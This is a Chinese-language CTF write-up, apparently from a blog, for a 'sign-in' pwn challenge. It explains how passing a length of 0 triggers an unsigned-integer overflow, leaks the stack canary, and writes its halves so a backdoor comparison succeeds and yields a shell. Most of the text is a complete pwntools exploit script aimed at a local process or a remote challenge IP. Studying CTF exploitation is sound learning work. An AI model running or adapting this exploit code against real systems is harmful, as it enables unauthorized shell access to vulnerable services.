签个到
居然是没开NX的,而且还有一个可写可执行的段
静态分析:
进入get()我们可以看到循环中如果满足heap[i] + 4LL与我们送入内容的前8字符相同,且送入内容+8地址内容(即canary)与heap[i]与的前8字符相同即可进入后门
add(16,b'aaaaaaaa')
get(b'aaaaaaaa')
随便调试看看
read_len():
read_con():
sla('power length: ',0)
#以0来利用整形溢出漏洞,下面进行栈溢出
int类型在linux下默认强制转换为unsign int类型进行比较,所以a与b比较的时候,a会自动转换成unsigned int类型进行比较。由于signed int的符号位最高位是1,转换成unsigned int之后,就会变成一个很大的unsigned int型正数
可以进行很多次的read(0,&buf,1uLL)
sla('> ',add_idx)
sla('power length: ',0)
ru('name: ')
pl=b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff)
#var_10 heap_size 保持原来的堆块
#var_8 canary后半段
sla('> ',add_idx)
sla('power length: ',8)
ru('name: ')
可以看到第二次add时2c0处是canary后半段而不是00000886
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
li('(canary>>32)&0xffffffff) = '+hex((canary>>32)&0xffffffff))
s(pl)
choice(get_idx)
ru('data: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
sl(pl)
比较后getshell
#encoding = utf-8
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
from ctypes import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import *
context.os = 'linux'
context.arch = 'amd64'
#context.arch = 'i386'
context.log_level = "debug"
name = './pwn'
debug = 0
if debug:
p = remote('172.52.16.218',9999)
else:
p = process(name)
libcso = '/lib/x86_64-linux-gnu/libc.so.6'
#libcso = './libc-2.31.so'
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)
s = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(str(delim),str(data))
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['gnome-terminal','-x','sh','-c']
add_idx = 1
delete_idx = 2
show_idx = 4
edit_idx = 3
def dbg():
gdb.attach(proc.pidof(p)[0])
pause()
bss = elf.bss()
ru('who are u?\n')
s(b'a'*9)
ru('aaaaaaaa')
canary = uu64(p.recv(8))-0x61
li(hex(canary))
def choice(cho):
sla('> ',cho)
def add(size,con):
choice(add_idx)
sla('power length: ',size)
ru('name: ')
sl(con)
def get(data):
choice(delete_idx)
ru('data: ')
s(data)
sla('> ',add_idx)
sla('power length: ',0)
ru('name: ')
pl=b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff)
li('canary&0xffffffff = '+hex(canary&0xffffffff))
sl(pl)
sla('> ',add_idx)
sla('power length: ',8)
ru('name: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
li('(canary>>32)&0xffffffff) = '+hex((canary>>32)&0xffffffff))
s(pl)
choice(delete_idx)
ru('data: ')
pl = p32((canary>>32)&0xffffffff)+b"aaaa"
sl(pl)
itr()
'''
def pwn():
if __name__ == '__main__':
pwn()
'''
标签:idx,canary,0xffffffff,2022,PWN,import,data,积分榜,lambda From: https://www.cnblogs.com/shuzM/p/16938731.html